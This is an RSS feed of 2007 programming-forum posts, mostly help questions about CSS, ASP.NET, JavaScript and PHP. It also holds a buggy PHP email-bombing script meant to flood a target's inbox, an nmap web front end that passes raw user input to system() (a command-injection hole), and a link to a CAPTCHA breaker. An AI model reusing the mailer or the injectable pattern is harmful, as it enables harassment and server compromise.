color=#111111&gt;&lt;/pre&gt;&lt;/FONT&gt;&lt;/P&gt;&lt;P&gt;&lt;FONT color=#111111&gt;The CSS organises it so that these 3 colums are aligned horizontally - splitting the page into 3 sections, and each has a background colour. &lt;/FONT&gt;&lt;/P&gt;&lt;P&gt;(this isn't true, but it works for my demonstration)&lt;/P&gt;&lt;P&gt;&lt;FONT color=#111111&gt;Now, leftContent has far more text in it than the other two. So, it's background colour (red) goes much further down the page than the others.&lt;/FONT&gt;&lt;/P&gt;&lt;P&gt;&lt;FONT color=#111111&gt;|&lt;FONT color=#dd3333&gt;//&lt;/FONT&gt;|&lt;FONT color=#9999dd&gt;//&lt;/FONT&gt;|&lt;FONT color=#bbbb99&gt;//&lt;/FONT&gt;|&lt;BR&gt;|&lt;FONT color=#dd3333&gt;//&lt;/FONT&gt;|&lt;FONT color=#9999dd&gt;//&lt;/FONT&gt;|&lt;FONT color=#bbbb99&gt;//&lt;/FONT&gt;|&lt;BR&gt;|&lt;FONT color=#dd3333&gt;//&lt;/FONT&gt;|&lt;FONT color=#9999dd&gt;//&lt;/FONT&gt;|&lt;FONT color=#ffffff&gt;//&lt;/FONT&gt;|&lt;BR&gt;|&lt;FONT color=#dd3333&gt;//&lt;/FONT&gt;|&lt;FONT color=#ffffff&gt;//&lt;/FONT&gt;|&lt;FONT color=#ffffff&gt;//&lt;/FONT&gt;|&lt;BR&gt;|&lt;FONT color=#dd3333&gt;//&lt;/FONT&gt;|&lt;FONT color=#ffffff&gt;//&lt;/FONT&gt;|&lt;FONT color=#ffffff&gt;//&lt;/FONT&gt;|&lt;/FONT&gt;&lt;/P&gt;&lt;P&gt;&lt;FONT color=#111111&gt;How do I get CSS to make the other 2 colums the same height, even if there isn't enough content to fill them? ie..&lt;/FONT&gt;&lt;/P&gt;&lt;P&gt;&lt;FONT color=#111111&gt;|&lt;/FONT&gt;&lt;FONT color=#dd3333&gt;//&lt;/FONT&gt;&lt;FONT color=#111111&gt;|&lt;/FONT&gt;&lt;FONT color=#9999dd&gt;//&lt;/FONT&gt;&lt;FONT color=#111111&gt;|&lt;/FONT&gt;&lt;FONT color=#bbbb99&gt;//&lt;/FONT&gt;&lt;FONT color=#111111&gt;|&lt;BR&gt;|&lt;/FONT&gt;&lt;FONT color=#dd3333&gt;//&lt;/FONT&gt;&lt;FONT color=#111111&gt;|&lt;/FONT&gt;&lt;FONT color=#9999dd&gt;//&lt;/FONT&gt;&lt;FONT color=#111111&gt;|&lt;/FONT&gt;&lt;FONT color=#bbbb99&gt;//&lt;/FONT&gt;&lt;FONT color=#111111&gt;|&lt;BR&gt;|&lt;/FONT&gt;&lt;FONT color=#dd3333&gt;//&lt;/FONT&gt;&lt;FONT color=#111111&gt;|&lt;/FONT&gt;&lt;FONT color=#9999dd&gt;//&lt;/FONT&gt;&lt;FONT color=#111111&gt;|&lt;/FONT&gt;&lt;FONT color=#bbbb99&gt;//&lt;/FONT&gt;&lt;FONT color=#111111&gt;|&lt;BR&gt;|&lt;/FONT&gt;&lt;FONT color=#dd3333&gt;//&lt;/FONT&gt;&lt;FONT color=#111111&gt;|&lt;/FONT&gt;&lt;FONT color=#9999dd&gt;//&lt;/FONT&gt;&lt;FONT color=#111111&gt;|&lt;/FONT&gt;&lt;FONT color=#bbbb99&gt;//&lt;/FONT&gt;&lt;FONT color=#111111&gt;|&lt;BR&gt;|&lt;/FONT&gt;&lt;FONT color=#dd3333&gt;//&lt;/FONT&gt;&lt;FONT color=#111111&gt;|&lt;/FONT&gt;&lt;FONT color=#9999dd&gt;//&lt;/FONT&gt;&lt;FONT color=#111111&gt;|&lt;/FONT&gt;&lt;FONT color=#bbbb99&gt;//&lt;/FONT&gt;&lt;FONT color=#111111&gt;|&lt;/FONT&gt;&lt;/P&gt;&lt;P&gt;&lt;FONT color=#111111&gt;I've tried height: 100%, and I've tried setting a negative margin, but that doesn't work in IE6 (the colours go beyond the "content" div to the bottom of the page).&lt;/FONT&gt;&lt;/P&gt;&lt;P&gt;&lt;FONT color=#111111&gt;Any ideas?!! (and yes I know I suck at CSS &lt;img align="absmiddle" src="http://bbs.progenic.com/Skins/Common/EmotIcons/Smile.gif" border="0" title="Smile"&gt;&lt;/FONT&gt;&lt;/P&gt;&lt;/FONT&gt;</description><pubDate>Sat, 01 Dec 2007 06:14:52 GMT</pubDate><dc:creator>godhn</dc:creator></item><item><title>ASP.net Page Lifecyle</title><link>http://bbs.progenic.com/Topic12849-9-1.aspx</link><description>Hi .netters,&lt;/P&gt;&lt;P&gt;I have a problem with my URL Rewrite engine, which works fine, but uses Application_BeginRequest() in my global.asax. The host for the site, 1&amp;amp;1, doesn't allow me to hook into BeginRequest (so it seems), and I'm struggling to find an alternative.&lt;/P&gt;&lt;P&gt;Here are the ones I know fire..&lt;/P&gt;&lt;P&gt;PreInit&lt;BR&gt;Init&lt;BR&gt;InitComplete&lt;BR&gt;PreLoad&lt;BR&gt;Load&lt;BR&gt;LoadComplete&lt;BR&gt;PreRender&lt;BR&gt;PreRenderComplete&lt;/P&gt;&lt;P&gt;(this list sounds like something from austin powers. 'PreRenderCom.. Com.. Com.. PreRenderCom..')&lt;/P&gt;&lt;P&gt;SaveState&lt;BR&gt;SaveStateComplete&lt;BR&gt;Render&lt;/P&gt;&lt;P&gt;I've tried hooking into PreRenderHandlerExecute() in global.asax, to see if that works. It does, but my Rewrite engine uses HttpContext.Current.RewritePath, which, from PreRenderHandlerExecute, doesn't get resent through the ASPnet engine, so I end up with the page code on screen.&lt;/P&gt;&lt;P&gt;Can someone give me a rewrite command that will shove it back through the engine, or suggest one of the above functions that would allow me to rewrite the path (prefferably from global.asax)&lt;/P&gt;&lt;P&gt;Thanks,&lt;/P&gt;&lt;P&gt;Dan</description><pubDate>Wed, 05 Dec 2007 09:18:45 GMT</pubDate><dc:creator>godhn</dc:creator></item><item><title>forcing new browser window to top</title><link>http://bbs.progenic.com/Topic12724-9-1.aspx</link><description>Hi peeps,&lt;/P&gt;&lt;P&gt;Long time no hear from me, eh?! Sorry about that - incredibly busy with that whole work/life balance stuff, unfortunately I seemed to have dropped the ball that says "communication" &lt;img align="absmiddle" src="http://bbs.progenic.com/Skins/Common/EmotIcons/Smile.gif" border="0" title="Smile"&gt;&lt;/P&gt;&lt;P&gt;Anyway, hope you're all well?&lt;/P&gt;&lt;P&gt;I'm trying to write a shopping basket for a website that actually loads my shopping basket.&lt;/P&gt;&lt;P&gt;Bascially, every buy now button on client has a href link to my site, with a target="my_cart" attrib. It works great, but there is a prob.&lt;/P&gt;&lt;P&gt;The first time it's clicked, it works perfectly - my site pops up with the clicked item in the cart already. They can go back to the client site, click the buy now button for another item, and my cart recognises that 2 items have been added. Great!&lt;/P&gt;&lt;P&gt;The problem is, the second time buy now you click doesn't bring my window to the front!! It updates it, but doesn't pop it back up, or make it flash on the taskbar or anything.&lt;/P&gt;&lt;P&gt;Any ideas how I can make it do that, prefferably without Javascript!? (although that might be difficult?)&lt;/P&gt;&lt;P&gt;Thanks for any ideas,&lt;/P&gt;&lt;P&gt;Dan&lt;/P&gt;&lt;P&gt;PS I know poping up new windows is bad, but I don't have a choice here. I am explaning to the user what will happen though!</description><pubDate>Sun, 25 Nov 2007 07:56:21 GMT</pubDate><dc:creator>godhn</dc:creator></item><item><title>php mass mailer</title><link>http://bbs.progenic.com/Topic12743-9-1.aspx</link><description>I cant get this to work, i could use any help you may have to offer. &lt;img align="absmiddle" src="http://bbs.progenic.com/Skins/Common/EmotIcons/Crazy.gif" border="0" title="Crazy"&gt;&lt;/P&gt;&lt;P&gt;Heres what i have so far...&lt;/P&gt;&lt;P&gt;&lt;pre&gt;&lt;/P&gt;&lt;P&gt;&amp;lt;html&amp;gt;&lt;BR&gt;&amp;lt;title&amp;gt;Mail Up The . . .&amp;lt;/title&amp;gt;&lt;BR&gt;&amp;lt;form action="" method="POST"&amp;gt;&lt;BR&gt;Target: &amp;lt;input type="text" name="tar"&amp;gt;&amp;lt;BR&amp;gt;&lt;BR&gt;From: &amp;lt;input type="text" name="from"&amp;gt;&amp;lt;BR&amp;gt;&lt;BR&gt;Subject: &amp;lt;input type="text" name="sub"&amp;gt;&amp;lt;BR&amp;gt;&lt;BR&gt;Message: &amp;lt;textarea rows=10 cols=50 name=message&amp;gt;&amp;lt;/textarea&amp;gt;&amp;lt;BR&amp;gt;&lt;BR&gt;Quantity: &amp;lt;input type="text" name="qu"&amp;gt;&lt;BR&gt;&amp;lt;input type="submit"&amp;gt;&amp;lt;BR&amp;gt;&amp;lt;BR&amp;gt;&lt;BR&gt;&amp;lt;?&lt;BR&gt;$to = $_POST["tar"];&lt;BR&gt;$headers = $_POST["from"];&lt;BR&gt;$subject = $_POST["sub"];&lt;BR&gt;$message = $_POST["message"];&lt;BR&gt;$i = $_POST["qu"];&lt;BR&gt;if($_POST["tar"]){&lt;BR&gt; while($i&amp;lt;="$qu"){&lt;BR&gt;  mail($to,$headers,$subject,$message);&lt;BR&gt;  $i++;}&lt;BR&gt;  echo "Pooped on " . $to . ". " . $i . " times, that sorry SOB";&lt;BR&gt;  }&lt;/P&gt;&lt;P&gt;else{}&lt;BR&gt;?&amp;gt;&lt;/pre&gt;</description><pubDate>Mon, 26 Nov 2007 22:03:03 GMT</pubDate><dc:creator>Anarchy Angel</dc:creator></item><item><title>Fading a title (Ajax)</title><link>http://bbs.progenic.com/Topic12685-9-1.aspx</link><description>&lt;pre&gt;var SwitchInterval = 1000;&lt;br&gt;&lt;br&gt;var Counter = 0;&lt;br&gt;var CountedTitles;&lt;br&gt;var CountedFades;&lt;br&gt;var Event;&lt;br&gt;var FadeEvent;&lt;br&gt;var FadeCounter = 0;&lt;br&gt;&lt;br&gt;// Avaible titles, which will be shown in the "Information DIV"&lt;br&gt;var Title = new Array();&lt;br&gt;    Title[0] = "Whooho test 1";&lt;br&gt;    Title[1] = "Whooho test 234243";&lt;br&gt;    Title[2] = "Trallallalala..";&lt;br&gt;&lt;br&gt;// Fade effect on the Title's&lt;br&gt;var FadeStep = new Array();&lt;br&gt;    FadeStep[0] = "dad0c6";&lt;br&gt;    FadeStep[1] = "3d362d";&lt;br&gt;    FadeStep[2] = "423a31";&lt;br&gt;    FadeStep[3] = "473f35";&lt;br&gt;    FadeStep[4] = "4c4338";&lt;br&gt;    FadeStep[5] = "52483c";&lt;br&gt;    FadeStep[6] = "574c40";&lt;br&gt;    FadeStep[7] = "5c5144";&lt;br&gt;    FadeStep[8] = "615547";&lt;br&gt;    FadeStep[9] = "66594b";&lt;br&gt;    FadeStep[10] = "6b5e4f";&lt;br&gt;    FadeStep[11] = "706253";&lt;br&gt;    FadeStep[12] = "756756";&lt;br&gt;    FadeStep[13] = "7a6b5a";&lt;br&gt;    FadeStep[14] = "80705e";&lt;br&gt;    FadeStep[15] = "857462";&lt;br&gt;    FadeStep[16] = "8a7965";&lt;br&gt;    FadeStep[17] = "8f7d69";&lt;br&gt;    FadeStep[18] = "94826d";&lt;br&gt;    FadeStep[19] = "998671";&lt;br&gt;    FadeStep[20] = "9e8b74";&lt;br&gt;    FadeStep[21] = "a38f78";&lt;br&gt;    FadeStep[22] = "a8947c";&lt;br&gt;    FadeStep[23] = "ad9880";&lt;br&gt;    FadeStep[24] = "b29d84";&lt;br&gt;    FadeStep[25] = "b8a187";&lt;br&gt;    FadeStep[26] = "bda68b";&lt;br&gt;    FadeStep[27] = "c2aa8f";&lt;br&gt;    FadeStep[28] = "c7ae93";&lt;br&gt;    FadeStep[29] = "ccb396";&lt;br&gt;    FadeStep[30] = "d1b79a";&lt;br&gt;    FadeStep[31] = "d4ba9c";&lt;br&gt;    &lt;br&gt;function FadeTitle(){&lt;br&gt;    CountedFades = FadeStep.length;&lt;br&gt;    if(FadeSteps == CountedFades) FadeSteps = 0;&lt;br&gt;    &amp;#100;ocument.getElementById('Information').style.color = FadeStep[FadeSteps];&lt;br&gt;    FadeSteps = FadeSteps + 1;&lt;br&gt;    FadeEvent = setTimeout("FadeTitle()", 100);&lt;br&gt;}&lt;br&gt;    &lt;br&gt;function SwitchTitle(){&lt;br&gt;    CountedTitles = Title.length;&lt;br&gt;    if(Counter == CountedTitles) Counter = 0;&lt;br&gt;    &amp;#100;ocument.getElementById('Information').innerHTML = Title[Counter];&lt;br&gt;    Counter = Counter + 1;&lt;br&gt;    Event = setTimeout("SwitchTitle()", SwitchInterval);&lt;br&gt;    &lt;br&gt;    // Fade the title&lt;br&gt;    FadeTitle();&lt;br&gt;}&lt;/pre&gt;&lt;br&gt;This code is supposed to switch content in a "div", which works. BUT, I can't get the fade effect to work. What am I doin wrong?</description><pubDate>Fri, 23 Nov 2007 15:30:49 GMT</pubDate><dc:creator>andy</dc:creator></item><item><title>The Filebrowser</title><link>http://bbs.progenic.com/Topic10950-9-1.aspx</link><description>Allright, I've recently finished a php application in the name "The Filebrowser". It allows you to browse files and folders on any&lt;br&gt;Apache/PHP webserver. The only thing you need to do, is to unrar the .rar file in your webroot, and woalla!&lt;br&gt;&lt;br&gt;There might be hundreds or maybe millions filebrowsers out there today. So what is better with mine?&lt;br&gt;My filebrowser can apply plugins. Thats it.&lt;br&gt;It is still in very early stage, which means that you should be a little careful with it.&lt;br&gt;&lt;br&gt;Anyway, you can download it from here: &lt;a href="http://www.caffeinated.se/filebrowser" target="_blank" class="SmlLinks"&gt;http://www.caffeinated.se/filebrowser&lt;/a&gt; (I personally loves the domainname &lt;img align="absmiddle" src="http://bbs.progenic.com/Skins/Common/EmotIcons/Wink.gif" border="0" title="Wink"&gt;) &lt;br&gt;&lt;br&gt;I know that many of you are .net people, so I don't really expects many replies &lt;img align="absmiddle" src="http://bbs.progenic.com/Skins/Common/EmotIcons/Hehe.gif" border="0" title="Hehe"&gt;</description><pubDate>Fri, 13 Jul 2007 09:09:00 GMT</pubDate><dc:creator>andy</dc:creator></item><item><title>RS / Megashares / etc link checker</title><link>http://bbs.progenic.com/Topic12611-9-1.aspx</link><description>For example:&lt;br&gt;&lt;img src="http://g-brain.sesoyo.com/lc.php?link=http://rapidshare.com/files/54165877/THANKS_Uploaded_By_loSt_g00ns.net_.rar"&gt;   &lt;a href="'http://rapidshare.com/files/54165877/THANKS_Uploaded_By_loSt_g00ns.net_.rar'" target="_blank" class="SmlLinks"&gt;http://rapidshare.com/files/54165877/THANKS_Uploaded_By_loSt_g00ns.net_.rar&lt;/a&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;Source: &lt;a href='http://g-brain.sesoyo.com/lc3.php'&gt;http://g-brain.sesoyo.com/lc3.php&lt;/a&gt; (XHTML Strict + Javascript)&lt;br&gt;Code to check links: lc.php (PHP)&lt;br&gt;&lt;pre&gt;&lt;?php&lt;br&gt;$url = $_GET['link'];&lt;br&gt;if (!strstr($url,"http://")) {&lt;br&gt;$url = "http://".$url;&lt;br&gt;}&lt;br&gt;&lt;br&gt;if (strstr(parse_url($url,PHP_URL_HOST),"rapidshare.com")) {&lt;br&gt;$bait = "You want to download the file";&lt;br&gt;}&lt;br&gt;elseif (strstr(parse_url($url,PHP_URL_HOST),"megashares.com")) {&lt;br&gt;$bait = "Your Download Passport is:";&lt;br&gt;}&lt;br&gt;else {&lt;br&gt;die("DEBUG: ".parse_url($url,PHP_URL_HOST)."&lt;br&gt;Link invalid");&lt;br&gt;}&lt;br&gt;&lt;br&gt;$curl = curl_init();&lt;br&gt;curl_setopt($curl, CURLOPT_URL, $url);&lt;br&gt;curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);&lt;br&gt;curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);&lt;br&gt;curl_setopt($curl, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);&lt;br&gt;if (strstr(curl_exec($curl),$bait)) {&lt;br&gt;header("Content-type: image/png");&lt;br&gt;echo file_get_contents("alive.png");&lt;br&gt;}&lt;br&gt;else {&lt;br&gt;header("Content-type: image/png");&lt;br&gt;echo file_get_contents("dead.png");&lt;br&gt;}&lt;br&gt;curl_close($curl);&lt;br&gt;?&gt;&lt;/pre&gt;&lt;br&gt;It needs a little work though, like displaying something like a red cross when the link is invalid (non-rapidshare, non-megashares).&lt;br&gt;&lt;br&gt;It can be adapted for any service, just change the bait &lt;img align="absmiddle" src="http://bbs.progenic.com/Skins/Common/EmotIcons/Wink.gif" border="0" title="Wink"&gt;</description><pubDate>Wed, 21 Nov 2007 12:55:16 GMT</pubDate><dc:creator>G-Brain</dc:creator></item><item><title>CAPTCHAPWN</title><link>http://bbs.progenic.com/Topic12534-9-1.aspx</link><description>Friend has a CAPTCHA on his website, I told him it's not secure, he wouldn't listen, I beat the CAPTCHA. True story.&lt;br&gt;&lt;br&gt;PHP: &lt;a href='http://g-brain.sesoyo.com/captchapwn.php'&gt;http://g-brain.sesoyo.com/captchapwn.php&lt;/a&gt;&lt;br&gt;Source: &lt;a href='http://g-brain.sesoyo.com/code/captchapwn-php.txt'&gt;http://g-brain.sesoyo.com/code/captchapwn-php.txt&lt;/a&gt;&lt;br&gt;&lt;br&gt;It's not 100% accurate, but it does the trick.</description><pubDate>Fri, 16 Nov 2007 13:47:41 GMT</pubDate><dc:creator>G-Brain</dc:creator></item><item><title>another php help topic</title><link>http://bbs.progenic.com/Topic12412-9-1.aspx</link><description>&lt;pre&gt;$pic_data['html'] = $pic_data['html'].'&lt;br&gt;CODE '.$CONFIG['ecards_more_pic_target'].$fullsize_url.' &gt;&lt;br&gt;CODE2'; &lt;br&gt;	return $pic_data; &lt;/pre&gt;&lt;br&gt;in the spaces i wrote code how can i add &lt; img src= in the middle those 2 vectors generate my url and at the end &gt; without my site interpreting the code as a picture ....but i want it to apare as the code ...i just don't want it to read the code</description><pubDate>Sat, 10 Nov 2007 12:35:28 GMT</pubDate><dc:creator>_Infernal_</dc:creator></item><item><title>custom http headers with php</title><link>http://bbs.progenic.com/Topic12428-9-1.aspx</link><description>So i want to make a php file that allows me to send custom http headers to web servers and get the response. Where should i start? I thought about using the header() but its seems to be limited in use. Any ideas?</description><pubDate>Sat, 10 Nov 2007 20:29:17 GMT</pubDate><dc:creator>Anarchy Angel</dc:creator></item><item><title>php help</title><link>http://bbs.progenic.com/Topic12363-9-1.aspx</link><description>Ok so lets say im running a linux box with nmap, i want to set up a web iface to run nmap from&lt;/P&gt;&lt;P&gt;heres what i got so far&lt;/P&gt;&lt;P&gt;&lt;pre&gt;&lt;/P&gt;&lt;P&gt;&amp;lt;?php&lt;/P&gt;&lt;P&gt;system("nmap -$target -$type") ;&lt;BR&gt;echo '&amp;lt;form methode="post" action="port2.php" /&amp;gt;' ;&lt;BR&gt;echo 'Target: &amp;lt;input type="text" name="target" /&amp;gt;' ;&lt;BR&gt;echo 'Scan type: &amp;lt;input type="text" name="type" /&amp;gt;' ;&lt;BR&gt;echo '&amp;lt;input type="submit" name="submit" /&amp;gt;' ;&lt;BR&gt;?&amp;gt;&lt;/pre&gt;&lt;/P&gt;&lt;P&gt;I have just started working with php, but im sure you can tell that. Any ideas?</description><pubDate>Tue, 06 Nov 2007 14:42:35 GMT</pubDate><dc:creator>Anarchy Angel</dc:creator></item></channel></rss>